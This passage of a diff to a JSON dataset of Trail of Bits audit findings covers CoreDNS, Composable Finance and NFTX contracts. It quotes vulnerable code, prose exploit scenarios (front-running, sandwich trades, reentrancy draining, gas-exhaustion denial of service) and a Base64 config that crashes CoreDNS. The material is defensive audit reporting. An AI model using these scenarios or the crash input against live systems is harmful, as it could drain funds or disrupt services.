repository and pushes malicious code to the master branch. When Grafana is set up, it downloads the plugin code from the master branch. Because unsigned plugins are allowed, Grafana directly loads the malicious plugin. Recommendations Short term, install the BigQuery Datasource plugin from a signed source such as the Grafana catalog, and disallow the loading of any unsigned plugins. Long term, review the vendor recommendations when conguring new software and avoid disabling security features such as signature checks. When referencing external code and software releases, do so by immutable hash digests instead of named tags or branches to prevent unintended modications. References Plugin Signatures , Grafana Labs 24. Insu\u0000cient validation of JWTs used for GraphQL subscriptions Severity: Low Diculty: Low Type: Authentication Finding ID: TOB-GALOY-24 Target: galoy/src/servers/graphql-server.ts", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: High" ] }, { - "title": "14. Lack of a limit on the size of response bodies ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "The ioutil.ReadAll function reads from a source input until encountering an error or the end of the le, at which point it returns the data that it read. The toMsg function, which processes requests for the HTTP server, uses ioutil.ReadAll to parse requests and to read POST bodies. However, there is no limit on the size of request bodies. Using ioutil.ReadAll to parse a large request that is loaded multiple times may exhaust the systems memory, causing a DoS. func toMsg(r io.ReadCloser) (*dns.Msg, error ) { buf, err := io.ReadAll(r) if err != nil { return nil , err } m := new (dns.Msg) err = m.Unpack(buf) return m, err } Figure 14.1: plugin/pkg/doh/doh.go#L94-L102 Exploit Scenario An attacker generates multiple POST requests with long request bodies to /dns-query , leading to the exhaustion of its resources. Recommendations Short term, use the io.LimitReader function or another mechanism to limit the size of request bodies. Long term, consider implementing application-wide limits on the size of request bodies to prevent DoS attacks.", + "title": "1. Reliance on third-party library for deployment ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "Due to the use of the delegatecall proxy pattern, some NFTX contracts cannot be initialized with their own constructors; instead, they have initializer functions. These functions can be front-run, allowing an attacker to initialize contracts incorrectly. function __NFTXInventoryStaking_init(address _nftxVaultFactory) external virtual override initializer { __Ownable_init(); nftxVaultFactory = INFTXVaultFactory(_nftxVaultFactory); address xTokenImpl = address(new XTokenUpgradeable()); __UpgradeableBeacon__init(xTokenImpl); } Figure 1.1: The initializer function in NFTXInventoryStaking.sol:37-42 The following contracts have initializer functions that can be front-run: NFTXInventoryStaking NFTXVaultFactoryUpgradeable NFTXEligibilityManager NFTXLPStaking NFTXSimpleFeeDistributor The NFTX team relies on hardhat-upgrades, a library that oers a series of safety checks for use with certain OpenZeppelin proxy reference implementations to aid in the proxy deployment process. It is important that the NFTX team become familiar with how the hardhat-upgrades library works internally and with the caveats it might have. For example, some proxy patterns like the beacon pattern are not yet supported by the library. Exploit Scenario Bob uses the library incorrectly when deploying a new contract: he calls upgradeTo() and then uses the fallback function to initialize the contract. Eve front-runs the call to the initialization function and initializes the contract with her own address, which results in an incorrect initialization and Eves control over the contract. Recommendations Short term, document the protocols use of the library and the proxy types it supports. Long term, use a factory pattern instead of the initializer functions to prevent front-running of the initializer functions.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "15. Index-out-of-range panic in grpc plugin initialization ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "Initializing the grpc plugin involves parsing the relevant conguration section. func parseStanza(c *caddy.Controller) (*GRPC, error ) { g := newGRPC() if !c.Args(&g.from) { return g, c.ArgErr() } g.from = plugin.Host(g.from).NormalizeExact()[ 0 ] // only the first is used. Figure 15.1: plugin/grpc/setup.go#L53-L59 An invalid conguration le for the grpc plugin could cause the call to NormalizeExtract (highlighted in gure 15.1) to return a value with zero elements. A Base64-encoded example of such a conguration le is shown below. MApncnBjIDAwMDAwMDAwMDAwhK2FhYKtMIStMITY2NnY2dnY7w== Figure 15.2: The Base64-encoded grpc conguration le Specifying a conguration le like that in gure 15.2 would cause CoreDNS to panic when attempting to access the rst element of the return value. panic: runtime error: index out of range [0] with length 0 goroutine 1 [running]: github.com/coredns/coredns/plugin/grpc.parseStanza(0xc0002f0900) /home/ubuntu/audit-coredns/client-code/coredns/plugin/grpc/setup.go:59 +0x31b github.com/coredns/coredns/plugin/grpc.parseGRPC(0xc0002f0900) /home/ubuntu/audit-coredns/client-code/coredns/plugin/grpc/setup.go:45 +0x5e github.com/coredns/coredns/plugin/grpc.setup(0x1e4dcc0) /home/ubuntu/audit-coredns/client-code/coredns/plugin/grpc/setup.go:17 +0x30 github.com/coredns/caddy.executeDirectives(0xc0000e2900, {0x7ffc15b696e0, 0x31}, {0x324cfa0, 0x31, 0x1000000004b7e06}, {0xc000269300, 0x1, 0x8}, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:661 +0x5f6 github.com/coredns/caddy.ValidateAndExecuteDirectives({0x2239518, 0xc0002b2980}, 0xc0002b2980, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:612 +0x3e5 github.com/coredns/caddy.startWithListenerFds({0x2239518, 0xc0002b2980}, 0xc0000e2900, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:515 +0x274 github.com/coredns/caddy.Start({0x2239518, 0xc0002b2980}) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:472 +0xe5 github.com/coredns/coredns/coremain.Run() /home/ubuntu/audit-coredns/client-code/coredns/coremain/run.go:62 +0x1cd main.main() /home/ubuntu/audit-coredns/client-code/coredns/coredns.go:12 +0x17 Figure 15.3: CoreDNS panics when loading the grpc conguration. Exploit Scenario An operator of a CoreDNS server miscongures the grpc plugin, causing a panic. Because CoreDNS does not provide a clear explanation of what went wrong, it is dicult for the operator to troubleshoot and x the issue. Recommendations Short term, verify that the variable returned by NormalizeExtract has at least one element before indexing it. Long term, review the codebase for instances in which data is indexed without undergoing a length check; handling untrusted data in this way may lead to a more severe DoS. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "title": "2. Missing validation of proxy admin indices ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "Multiple functions of the ProxyController contract take an index as an input. The index determines which proxy (managed by the controller) is being targeted. However, the index is never validated, which means that the function will be executed even if the index is out of bounds with respect to the number of proxies managed by the contract (in this case, ve). function changeProxyAdmin(uint256 index, address newAdmin) public onlyOwner { } if (index == 0) { vaultFactoryProxy.changeAdmin(newAdmin); } else if (index == 1) { eligManagerProxy.changeAdmin(newAdmin); } else if (index == 2) { stakingProviderProxy.changeAdmin(newAdmin); } else if (index == 3) { stakingProxy.changeAdmin(newAdmin); } else if (index == 4) { feeDistribProxy.changeAdmin(newAdmin); } emit ProxyAdminChanged(index, newAdmin); Figure 2.1: The changeProxyAdmin function in ProxyController.sol:79-95 In the changeProxyAdmin function, a ProxyAdminChanged event is emitted even if the supplied index is out of bounds (gure 2.1). Other ProxyController functions return the zero address if the index is out of bounds. For example, getAdmin() should return the address of the targeted proxys admin. If getAdmin() returns the zero address, the caller cannot know whether she supplied the wrong index or whether the targeted proxy simply has no admin. function getAdmin(uint256 index) public view returns (address admin) { if (index == 0) { return vaultFactoryProxy.admin(); } else if (index == 1) { return eligManagerProxy.admin(); } else if (index == 2) { return stakingProviderProxy.admin(); } else if (index == 3) { return stakingProxy.admin(); } else if (index == 4) { return feeDistribProxy.admin(); } } Figure 2.2: The getAdmin function in ProxyController.sol:38-50 Exploit Scenario A contract relying on the ProxyController contract calls one of the view functions, like getAdmin(), with the wrong index. The function is executed normally and implicitly returns zero, leading to unexpected behavior. Recommendations Short term, document this behavior so that clients are aware of it and are able to include safeguards to prevent unanticipated behavior. Long term, consider adding an index check to the aected functions so that they revert if they receive an out-of-bounds index.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: Low" ] }, { - "title": "1. Initialization functions can be front-run ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The CrosslayerPortal contracts have initializer functions that can be front-run, allowing an attacker to incorrectly initialize the contracts. Due to the use of the delegatecall proxy pattern, these contracts cannot be initialized with their own constructors, and they have initializer functions: function initialize() public initializer { __Ownable_init(); __Pausable_init(); __ReentrancyGuard_init(); } Figure 1.1: The initialize function in MsgSender:126-130 An attacker could front-run these functions and initialize the contracts with malicious values. This issue aects the following system contracts: contracts/core/BridgeAggregator contracts/core/InvestmentStrategyBase contracts/core/MosaicHolding contracts/core/MosaicVault contracts/core/MosaicVaultConfig contracts/core/functionCalls/MsgReceiverFactory contracts/core/functionCalls/MsgSender contracts/nfts/Summoner contracts/protocols/aave/AaveInvestmentStrategy contracts/protocols/balancer/BalancerV1Wrapper contracts/protocols/balancer/BalancerVaultV2Wrapper contracts/protocols/bancor/BancorWrapper contracts/protocols/compound/CompoundInvestmentStrategy contracts/protocols/curve/CurveWrapper contracts/protocols/gmx/GmxWrapper contracts/protocols/sushiswap/SushiswapLiquidityProvider contracts/protocols/synapse/ISynapseSwap contracts/protocols/synapse/SynapseWrapper contracts/protocols/uniswap/IUniswapV2Pair contracts/protocols/uniswap/UniswapV2Wrapper contracts/protocols/uniswap/UniswapWrapper Exploit Scenario Bob deploys the MsgSender contract. Eve front-runs the contracts initialization and sets her own address as the owner address. As a result, she can use the initialize function to update the contracts variables, modifying the system parameters. Recommendations Short term, to prevent front-running of the initializer functions, use hardhat-deploy to initialize the contracts or replace the functions with constructors. Alternatively, create a deployment script that will emit sucient errors when an initialize call fails. Long term, carefully review the Solidity documentation, especially the Warnings section, as well as the pitfalls of using the delegatecall proxy pattern.", + "title": "3. Random token withdrawals can be gamed ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "The algorithm used to randomly select a token for withdrawal from a vault is deterministic and predictable. function getRandomTokenIdFromVault() internal virtual returns (uint256) { uint256 randomIndex = uint256( keccak256( abi.encodePacked( blockhash(block.number - 1), randNonce, block.coinbase, block.difficulty, block.timestamp ) ) ) % holdings.length(); ++randNonce; return holdings.at(randomIndex); } Figure 3.1: The getRandomTokenIdFromVault function in NFTXVaultUpgradable.sol:531-545 All the elements used to calculate randomIndex are known to the caller (gure 3.1). Therefore, a contract calling this function can predict the resulting token before choosing to execute the withdrawal. This nding is of high diculty because NFTXs vault economics incentivizes users to deposit tokens of equal value. Moreover, the cost of deploying a custom exploit contract will likely outweigh the fee savings of choosing a token at random for withdrawal. Exploit Scenario Alice wishes to withdraw a specic token from a vault but wants to pay the lower random redemption fee rather than the higher target redemption fee. She deploys a contract that checks whether the randomly chosen token is her target and, if so, automatically executes the random withdrawal. Recommendations Short term, document the risks described in this nding so that clients are aware of them. Long term, consider removing all randomness from NFTX.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "2. Trades are vulnerable to sandwich attacks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The swapToNative function does not allow users to specify the minAmountOut parameter of swapExactTokensForETH , which indicates the minimum amount of ETH that a user will receive from a trade. Instead, the value is hard-coded to zero, meaning that there is no guarantee that users will receive any ETH in exchange for their tokens. By using a bot to sandwich a users trade, an attacker could increase the slippage incurred by the user and prot o of the spread at the users expense. The minAmountOut parameter is meant to prevent the execution of trades through illiquid pools and to provide protection against sandwich attacks. The current implementation lacks protections against high slippage and may cause users to lose funds. This applies to the AVAX version, too. Composable Finance indicated that only the relayer will call this function, but the function lacks access controls to prevent users from calling it directly. Importantly, it is highly likely that if a relayer does not implement proper protections, all of its trades will suer from high slippage, as they will represent pure-prot opportunities for sandwich bots. uint256 [] memory amounts = swapRouter.swapExactTokensForETH( _amount, 0 , path, _to, deadline ); Figure 2.1: Part of the SwapToNative function in MosaicNativeSwapperETH.sol: 4450 Exploit Scenario Bob, a relayer, makes a trade on behalf of a user. The minAmountOut value is set to zero, which means that the trade can be executed at any price. As a result, when Eve sandwiches the trade with a buy and sell order, Bob sells the tokens without purchasing any, eectively giving away tokens for free. Recommendations Short term, allow users (relayers) to input a slippage tolerance, and add access controls to the swapToNative function. Long term, consider the risks of integrating with other protocols such as Uniswap and implement mitigations for those risks.", + "title": "4. Duplicate receivers allowed by addReceiver() ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "The NFTXSimpleFeeDistributor contract is in charge of protocol fee distribution. To facilitate the fee distribution process, it allows the contract owner (the NFTX DAO) to manage a list of fee receivers. To add a new fee receiver to the contract, the owner calls the addReceiver() function. function addReceiver( uint256 _allocPoint, address _receiver, bool _isContract ) external override virtual onlyOwner { _addReceiver(_allocPoint, _receiver, _isContract); } Figure 4.1: The addReceiver() function in NFTXSimpleFeeDistributor This function in turn executes the internal logic that pushes a new receiver to the receiver list. function _addReceiver( uint256 _allocPoint, address _receiver, bool _isContract ) internal virtual { FeeReceiver memory _feeReceiver = FeeReceiver(_allocPoint, _receiver, _isContract); feeReceivers.push(_feeReceiver); allocTotal += _allocPoint; emit AddFeeReceiver(_receiver, _allocPoint); } Figure 4.2: The _addReceiver() function in NFTXSimpleFeeDistributor However, the function does not check whether the receiver is already in the list. Without this check, receivers can be accidentally added multiple times to the list, which would increase the amount of fees they receive. The issue is of high diculty because the addReceiver() function is owner-protected and, as indicated by the NFTX team, the owner is the NFTX DAO. Because the DAO itself was out of scope for this review, we do not know what the process to become a receiver looks like. We assume that a DAO proposal has to be created and a certain quorum has to be met for it to be executed. Exploit Scenario A proposal is created to add a new receiver to the fee distributor contract. The receiver address was already added, but the DAO members are not aware of this. The proposal passes, and the receiver is added. The receiver gains more fees than he is entitled to. Recommendations Short term, document this behavior so that the NFTX DAO is aware of it and performs the adequate checks before adding a new receiver. Long term, consider adding a duplicate check to the _addReceiver() function.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Medium", + "Difficulty: High" ] }, { - "title": "3. forwardCall creates a denial-of-service attack vector ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "Low-level external calls can exhaust all available gas by returning an excessive amount of data, thereby causing the relayer to incur memory expansion costs. This can be used to cause an out-of-gas exception and is a denial-of-service (DoS) attack vector. Since arbitrary contracts can be called, Composable Finance should implement additional safeguards. If an out-of-gas exception occurs, the message will never be marked as forwarded ( forwarded[id] = true ). If the relayer repeatedly retries the transaction, assuming it will eventually be marked as forwarded, the queue of pending transactions will grow without bounds, with each unsuccessful message-forwarding attempt carrying a gas cost. The approveERC20TokenAndForwardCall function is also vulnerable to this DoS attack. (success, returnData) = _contract. call {value: msg.value }(_data); require (success, \"Failed to forward function call\" ); uint256 balance = IERC20(_feeToken).balanceOf( address ( this )); require ( balance >= _feeAmount, \"Not enough tokens for the fee\" ); forwarded[_id] = true ; Figure 3.1: Part of the forwardCall function in MsgReceiver:79-85 Exploit Scenario Eve deploys a contract that returns 10 million bytes of data. A call to that contract causes an out-of-gas exception. Since the transaction is not marked as forwarded, the relayer continues to propagate the transaction without success. This results in excessive resource consumption and a degraded quality of service. Recommendations Short term, require that the size of return data be xed to 32 bytes. Long term, review the documentation on low-level Solidity calls and EVM edge cases. References Excessively Safe Call", + "title": "5. OpenZeppelin vulnerability can break initialization ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "NFTX extensively uses OpenZeppelin v3.4.1. A bug was recently discovered in all OpenZeppelin versions prior to v4.4.1 that aects initializer functions invoked separately during contract creation: the bug causes the contract initialization modier to fail to prevent reentrancy to the initializers (see CVE-2021-46320). Currently, no external calls to untrusted code are made during contract initialization. However, if the NFTX team were to add a new feature that requires such calls to be made, it would have to add the necessary safeguards to prevent reentrancy. Exploit Scenario An NFTX contract initialization function makes a call to an external contract that calls back to the initializer with dierent arguments. The faulty OpenZeppelin initializer modier fails to prevent this reentrancy. Recommendations Short term, upgrade OpenZeppelin to v4.4.1 or newer. Long term, integrate a dependency checking tool like Dependabot into the NFTX CI process.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: Low" ] }, { - "title": "8. Lack of two-step process for contract ownership changes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The owner of a contract in the Composable Finance ecosystem can be changed through a call to the transferOwnership function. This function internally calls the setOwner function, which immediately sets the contracts new owner. Making such a critical change in a single step is error-prone and can lead to irrevocable mistakes. /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership () public virtual onlyOwner { _setOwner( address ( 0 )); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership ( address newOwner ) public virtual onlyOwner { require (newOwner != address ( 0 ), \"Ownable: new owner is the zero address\" ); _setOwner(newOwner); } function _setOwner ( address newOwner ) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } Figure 8.1: OpenZeppelins OwnableUpgradeable contract Exploit Scenario Bob, a Composable Finance developer, invokes transferOwnership() to change the address of an existing contracts owner but accidentally enters the wrong address. As a result, he permanently loses access to the contract. Recommendations Short term, perform ownership transfers through a two-step process in which the owner proposes a new address and the transfer is completed once the new address has executed a call to accept the role. Long term, identify and document all possible actions that can be taken by privileged accounts and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.", + "title": "6. Potentially excessive gas fees imposed on users for protocol fee distribution ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "Whenever a user executes a minting, redeeming, or swapping operation on a vault, a fee is charged to the user and is sent to the NFXTSimpleFeeDistributor contract for distribution. function _chargeAndDistributeFees(address user, uint256 amount) internal virtual { // Do not charge fees if the zap contract is calling // Added in v1.0.3. Changed to mapping in v1.0.5. INFTXVaultFactory _vaultFactory = vaultFactory; if (_vaultFactory.excludedFromFees(msg.sender)) { return; } // Mint fees directly to the distributor and distribute. if (amount > 0) { address feeDistributor = _vaultFactory.feeDistributor(); // Changed to a _transfer() in v1.0.3. _transfer(user, feeDistributor, amount); INFTXFeeDistributor(feeDistributor).distribute(vaultId); } } Figure 6.1: The _chargeAndDistributeFees() function in NFTXVaultUpgradeable.sol After the fee is sent to the NFXTSimpleFeeDistributor contract, the distribute() function is then called to distribute all accrued fees. function distribute(uint256 vaultId) external override virtual nonReentrant { require(nftxVaultFactory != address(0)); address _vault = INFTXVaultFactory(nftxVaultFactory).vault(vaultId); uint256 tokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); if (distributionPaused || allocTotal == 0) { IERC20Upgradeable(_vault).safeTransfer(treasury, tokenBalance); return; } uint256 length = feeReceivers.length; uint256 leftover; for (uint256 i; i < length; ++i) { FeeReceiver memory _feeReceiver = feeReceivers[i]; uint256 amountToSend = leftover + ((tokenBalance * _feeReceiver.allocPoint) / allocTotal); uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); amountToSend = amountToSend > currentTokenBalance ? currentTokenBalance : amountToSend; bool complete = _sendForReceiver(_feeReceiver, vaultId, _vault, amountToSend); if (!complete) { uint256 remaining = IERC20Upgradeable(_vault).allowance(address(this), _feeReceiver.receiver); IERC20Upgradeable(_vault).safeApprove(_feeReceiver.receiver, 0); leftover = remaining; } else { leftover = 0; } } if (leftover != 0) { uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); IERC20Upgradeable(_vault).safeTransfer(treasury, currentTokenBalance); } } Figure 6.2: The distribute() function in NFTXSimpleFeeDistributor.sol If the token balance of the contract is low enough (but not zero), the number of tokens distributed to each receiver (amountToSend) will be close to zero. Ultimately, this can disincentivize the use of the protocol, regardless of the number of tokens distributed. Users have to pay the gas fee for the fee distribution operation, the gas fees for the token operations (e.g., redeeming, minting, or swapping), and the protocol fees themselves. Exploit Scenario Alice redeems a token from a vault, pays the necessary protocol fee, sends it to the NFTXSimpleFeeDistributor contract, and calls the distribute() function. Because the balance of the distributor contract is very low (e.g., $0.50), Alice has to pay a substantial amount in gas to distribute a near-zero amount in fees between all fee receiver addresses. Recommendations Short term, add a requirement for a minimum balance that the NFTXSimpleFeeDistributor contract should have for the distribution operation to execute. Alternatively, implement a periodical distribution of fees (e.g., once a day or once every number of blocks). Long term, consider redesigning the fee distribution mechanism to prevent the distribution of small fees. Also consider whether protocol users should pay for said distribution. See appendix D for guidance on redesigning this mechanism.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -3202,29 +5880,39 @@ ] }, { - "title": "9. sendFunds is vulnerable to reentrancy by owners ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The sendFunds function is vulnerable to reentrancy and can be used by the owner of a token contract to drain the contract of its funds. Specically, because fundsTransfered[user] is written to after a call to an external contract, the contracts owner could input his or her own address and reenter the sendFunds function to drain the contracts funds. An owner could send funds to him- or herself without using the reentrancy, but there is no reason to leave this vulnerability in the code. Additionally, the FundKeeper contract can send funds to any user by calling setAmountToSend and then sendFunds . It is unclear why amountToSend is not changed (set to zero) after a successful transfer. It would make more sense to call setAmountToSend after each transfer and to store users balances in a mapping. function setAmountToSend ( uint256 amount ) external onlyOwner { amountToSend = amount; emit NewAmountToSend(amount); } function sendFunds ( address user ) external onlyOwner { require (!fundsTransfered[user], \"reward already sent\" ); require ( address ( this ).balance >= amountToSend, \"Contract balance low\" ); // solhint-disable-next-line avoid-low-level-calls ( bool sent , ) = user.call{value: amountToSend}( \"\" ); require (sent, \"Failed to send Polygon\" ); fundsTransfered[user] = true ; emit FundSent(amountToSend, user); } Figure 9.1: Part of the sendFunds function in FundKeeper.sol:23-38 Exploit Scenario Eves smart contract is the owner of the FundKeeper contract. Eves contract executes a transfer for which Eve should receive only 1 ETH. Instead, because the user address is a contract with a fallback function, Eve can reenter the sendFunds function and drain all ETH from the contract. Recommendations Short term, set fundsTransfered[user] to true prior to making external calls. Long term, store each users balance in a mapping to ensure that users cannot make withdrawals that exceed their balances. Additionally, follow the checks-eects-interactions pattern.", + "title": "7. Risk of denial of service due to unbounded loop ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "When protocol fees are distributed, the system loops through the list of beneciaries (known internally as receivers) to send them the protocol fees they are entitled to. function distribute(uint256 vaultId) external override virtual nonReentrant { require(nftxVaultFactory != address(0)); address _vault = INFTXVaultFactory(nftxVaultFactory).vault(vaultId); uint256 tokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); if (distributionPaused || allocTotal == 0) { IERC20Upgradeable(_vault).safeTransfer(treasury, tokenBalance); return; } uint256 length = feeReceivers.length; uint256 leftover; for (uint256 i; i < length; ++i) { FeeReceiver memory _feeReceiver = feeReceivers[i]; uint256 amountToSend = leftover + ((tokenBalance * _feeReceiver.allocPoint) / allocTotal); uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); amountToSend = amountToSend > currentTokenBalance ? currentTokenBalance : amountToSend; bool complete = _sendForReceiver(_feeReceiver, vaultId, _vault, amountToSend); if (!complete) { uint256 remaining = IERC20Upgradeable(_vault).allowance(address(this), _feeReceiver.receiver); IERC20Upgradeable(_vault).safeApprove(_feeReceiver.receiver, 0); leftover = remaining; } else { leftover = 0; } } if (leftover != 0) { uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); IERC20Upgradeable(_vault).safeTransfer(treasury, currentTokenBalance); } } Figure 7.1: The distribute() function in NFTXSimpleFeeDistributor.sol Because this loop is unbounded and the number of receivers can grow, the amount of gas consumed is also unbounded. function _sendForReceiver(FeeReceiver memory _receiver, uint256 _vaultId, address _vault, uint256 amountToSend) internal virtual returns (bool) { if (_receiver.isContract) { IERC20Upgradeable(_vault).safeIncreaseAllowance(_receiver.receiver, amountToSend); bytes memory payload = abi.encodeWithSelector(INFTXLPStaking.receiveRewards.selector, _vaultId, amountToSend); (bool success, ) = address(_receiver.receiver).call(payload); // If the allowance has not been spent, it means we can pass it forward to next. return success && IERC20Upgradeable(_vault).allowance(address(this), _receiver.receiver) == 0; } else { IERC20Upgradeable(_vault).safeTransfer(_receiver.receiver, amountToSend); return true; } } Figure 7.2: The _sendForReceiver() function in NFTXSimpleFeeDistributor.sol Additionally, if one of the receivers is a contract, code that signicantly increases the gas cost of the fee distribution will execute (gure 7.2). It is important to note that fees are usually distributed within the context of user transactions (redeeming, minting, etc.), so the total cost of the distribution operation depends on the logic outside of the distribute() function. Exploit Scenario The NFTX team adds a new feature that allows NFTX token holders who stake their tokens to register as receivers and gain a portion of protocol fees; because of that, the number of receivers grows dramatically. Due to the large number of receivers, the distribute() function cannot execute because the cost of executing it has reached the block gas limit. As a result, users are unable to mint, redeem, or swap tokens. Recommendations Short term, examine the execution cost of the function to determine the safe bounds of the loop and, if possible, consider splitting the distribution operation into multiple calls. Long term, consider redesigning the fee distribution mechanism to avoid unbounded loops and prevent denials of service. See appendix D for guidance on redesigning this mechanism.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Medium", + "Difficulty: High" ] }, { - "title": "20. MosaicVault and MosaicHolding owner has excessive privileges ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The owner of the MosaicVault and MosaicHolding contracts has too many privileges across the system. Compromise of the owners private key would put the integrity of the underlying system at risk. The owner of the MosaicVault and MosaicHolding contracts can perform the following privileged operations in the context of the contracts: Rescuing funds if the system is compromised Managing withdrawals, transfers, and fee payments Pausing and unpausing the contracts Rebalancing liquidity across chains Investing in one or more investment strategies Claiming rewards from one or more investment strategies The ability to drain funds, manage liquidity, and claim rewards creates a single point of failure. It increases the likelihood that the contracts owner will be targeted by an attacker and increases the incentives for the owner to act maliciously. Exploit Scenario Alice, the owner of MosaicVault and MosaicHolding , deploys the contracts. MosaicHolding eventually holds assets worth USD 20 million. Eve gains access to Alices machine, upgrades the implementations, pauses MosaicHolding , and drains all funds from the contract. Recommendations Short term, clearly document the functions and implementations that the owner of the MosaicVault and MosaicHolding contracts can change. Additionally, split the privileges provided to the owner across multiple roles (e.g., a fund manager, fund rescuer, owner, etc.) to ensure that no one address has excessive control over the system. Long term, develop user documentation on all risks associated with the system, including those associated with privileged users and the existence of a single point of failure.", + "title": "8. A malicious fee receiver can cause a denial of service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "Whenever a user executes a minting, redeeming, or swapping operation on a vault, a fee is charged to the user and is sent to the NFXTSimpleFeeDistributor contract for distribution. The distribution function loops through all fee receivers and sends them the number of tokens they are entitled to (see gure 7.1). If the fee receiver is a contract, a special logic is executed; instead of receiving the corresponding number of tokens, the receiver pulls all the tokens from the NFXTSimpleFeeDistributor contract. function _sendForReceiver(FeeReceiver memory _receiver, uint256 _vaultId, address _vault, uint256 amountToSend) internal virtual returns (bool) { if (_receiver.isContract) { IERC20Upgradeable(_vault).safeIncreaseAllowance(_receiver.receiver, amountToSend); bytes memory payload = abi.encodeWithSelector(INFTXLPStaking.receiveRewards.selector, _vaultId, amountToSend); (bool success, ) = address(_receiver.receiver).call(payload); // If the allowance has not been spent, it means we can pass it forward to next. return success && IERC20Upgradeable(_vault).allowance(address(this), _receiver.receiver) == 0; } else { IERC20Upgradeable(_vault).safeTransfer(_receiver.receiver, amountToSend); return true; } } Figure 8.1: The _sendForReceiver() function in NFTXSimpleFeeDistributor.sol In this case, because the receiver contract executes arbitrary logic and receives all of the gas, the receiver contract can spend all of it; as a result, only 1/64 of the original gas forwarded to the receiver contract would remain to continue executing the distribute() function (see EIP-150), which may not be enough to complete the execution, leading to a denial of service. The issue is of high diculty because the addReceiver() function is owner-protected and, as indicated by the NFTX team, the owner is the NFTX DAO. Because the DAO itself was out of scope for this review, we do not know what the process to become a receiver looks like. We assume that a proposal is created and a certain quorum has to be met for it to be executed. Exploit Scenario Eve, a malicious receiver, sets up a smart contract that consumes all the gas forwarded to it when receiveRewards is called. As a result, the distribute() function runs out of gas, causing a denial of service on the vaults calling the function. Recommendations Short term, change the fee distribution mechanism so that only a token transfer is executed even if the receiver is a contract. Long term, consider redesigning the fee distribution mechanism to prevent malicious fee receivers from causing a denial of service on the protocol. See appendix D for guidance on redesigning this mechanism.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "9. Vault managers can grief users ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "The process of creating vaults in the NFTX protocol is trustless. This means that anyone can create a new vault and use any asset as the underlying vault NFT. The user calls the NFTXVaultFactoryUpgradeable contract to create a new vault. After deploying the new vault, the contract sets the user as the vault manager. Vault managers can disable certain vault features (gure 9.1) and change vault fees (gure 9.2). function setVaultFeatures( bool _enableMint, bool _enableRandomRedeem, bool _enableTargetRedeem, bool _enableRandomSwap, bool _enableTargetSwap ) public override virtual { onlyPrivileged(); enableMint = _enableMint; enableRandomRedeem = _enableRandomRedeem; enableTargetRedeem = _enableTargetRedeem; enableRandomSwap = _enableRandomSwap; enableTargetSwap = _enableTargetSwap; emit EnableMintUpdated(_enableMint); emit EnableRandomRedeemUpdated(_enableRandomRedeem); emit EnableTargetRedeemUpdated(_enableTargetRedeem); emit EnableRandomSwapUpdated(_enableRandomSwap); emit EnableTargetSwapUpdated(_enableTargetSwap); } Figure 9.1: The setVaultFeatures() function in NFTXVaultUpgradeable.sol function setFees( uint256 _mintFee, uint256 _randomRedeemFee, uint256 